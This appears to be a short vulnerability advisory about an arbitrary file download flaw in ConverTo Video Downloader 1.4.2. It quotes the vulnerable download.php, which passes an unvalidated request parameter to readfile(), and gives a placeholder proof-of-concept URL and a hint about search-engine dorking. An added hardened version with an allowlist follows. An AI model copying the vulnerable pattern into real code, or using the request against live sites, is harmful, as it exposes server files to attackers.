ConverTo Video Downloader And Converter 1.4.2 File Download
ConverTo Video Downloader and Converter version 1.4.2 suffers from a file download vulnerability.
================================================================================
| # Title     : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Français V.(Pro)
| # Vendor    : https://codecanyon.net/item/converto-video-downloader-converter/13225966
| # Dork      :
================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] infected file : download.php

[+] line 12 readfile ($file); & line 5 $file = urldecode($_GET['f']);

<?php
if(isset($_GET['f'])){
    $siz = convertToBytes($_GET['sz']);
    // Request parameter "f" is taken as the file to send, with no validation
    $file = urldecode($_GET['f']);
    $rand = rand(0,5000);
    header("Content-Description: File Transfer");
    header("Content-Type: application/octet-stream");
    header('Content-Length: ' . $siz);
    header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");
    ob_clean();
    flush();
    // The unvalidated value reaches readfile() directly
    readfile ($file);
}

[+] http://localhost/[PATH]/download.php?f= Ev!l

Greetings to :
================================================================================
jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr
================================================================================
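
A hardened form of the `f` handling in download.php, as an added example that is not part of the original advisory or the vendor's code: the request parameter is only passed to `readfile()` after it parses as an https URL on an allowlisted host. Assumptions: the script is meant to proxy remote video URLs, PHP 7.1+ with `allow_url_fopen` enabled, and `ALLOWED_HOST_SUFFIXES` and `validated_source()` are hypothetical names with a placeholder allowlist.

```php
<?php
// Added example, not the vendor's code. Assumes PHP 7.1+ and allow_url_fopen enabled.
// ALLOWED_HOST_SUFFIXES is an assumed allowlist: set it to the hosts the site really proxies.
const ALLOWED_HOST_SUFFIXES = ['.fbcdn.net'];

/** Return a rebuilt https URL on an allowlisted host, or null if the input is rejected. */
function validated_source($raw): ?string
{
    if (!is_string($raw)) {
        return null;                        // e.g. f[]=x arrives as an array
    }
    // $_GET is already decoded once; no second urldecode(), which would permit double encoding.
    $p = parse_url($raw);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;                        // bare local paths have no scheme and host
    }
    if (strtolower($p['scheme']) !== 'https'
        || isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        return null;                        // rejects file://, php://, ftp://, http://, credentials
    }
    $host = strtolower($p['host']);
    if (!preg_match('/^[a-z0-9.-]+$/', $host)) {
        return null;                        // only plain DNS names
    }
    foreach (ALLOWED_HOST_SUFFIXES as $suffix) {
        if (substr($host, -strlen($suffix)) === $suffix) {
            // Rebuild from the parsed parts so the fetcher sees exactly what was validated.
            return 'https://' . $host . ($p['path'] ?? '/')
                 . (isset($p['query']) ? '?' . $p['query'] : '');
        }
    }
    return null;
}

$src = validated_source($_GET['f'] ?? null);
if ($src === null) {
    http_response_code(400);
    exit('Invalid source');
}
// Do not follow redirects: a redirect target is not covered by the allowlist check.
$ctx = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 15]]);
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="Facebook_video_' . random_int(0, 5000) . '.mp4"');
// Content-Length is omitted: the original took it from the client-supplied sz parameter.
readfile($src, false, $ctx);
```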